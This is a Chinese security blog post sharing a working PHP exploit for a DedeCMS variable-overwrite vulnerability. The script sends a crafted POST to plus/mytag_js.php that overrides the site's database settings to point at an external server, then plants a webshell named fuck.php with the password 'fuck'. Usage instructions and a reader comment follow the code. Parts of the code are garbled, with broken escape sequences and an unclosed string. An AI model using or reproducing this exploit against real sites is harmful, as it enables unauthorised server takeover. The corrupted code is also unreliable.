dedecms 变量覆盖 0day getshell 的一个 exp

  • A+
所属分类:lcx

    dedecms 变量覆盖 0day getshell 的一个 exp (不久前的 exp好用发出来共享而已),By:黑小子。

    dede 不久前爆的洞了 不过这个exp还蛮实用的 呵呵!

Exp:

#!usr/bin/php -w
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:


);
echo "rn";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "[*] Exploit Success n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.phpn" ;

if($aid==2)echo "[*] Shell:".$url."/$path/fuck.phpn" ;

if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.phpn";

}else{
echo "[*] Exploit Failed n";
}

function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1rn";
$data .= "Host: ".$host."rn";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1rn";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rn";
$data .= "Accept-Language: zh-cn,zh;q=0.5rn";
//$data .= "Accept-Encoding: gzip,deflatern";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7rn";
$data .= "Connection: keep-alivern";
$data .= "Content-Type: application/x-www-form-urlencodedrn";
$data .= "Content-Length: ".strlen($content)."rnrn";
$data .= $content."rn";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*]  No response from ".$host."n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>

搭建php环境 cmd下运行 dede.php  php

dede.php lcx.cc 1 vul

第一个是 网站 第二个是 ID 第三个是 路径

一句话密码为fuck

留言评论(旧系统):

佚名 @ 2013-03-11 23:05:53

老大,求解释 初学PHP 这个 要怎么运行...PHP环境搭建了...就是不知道怎么运行

本站回复:

文中已写出说明。

文章来源于lcx.cc:dedecms 变量覆盖 0day getshell 的一个 exp

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: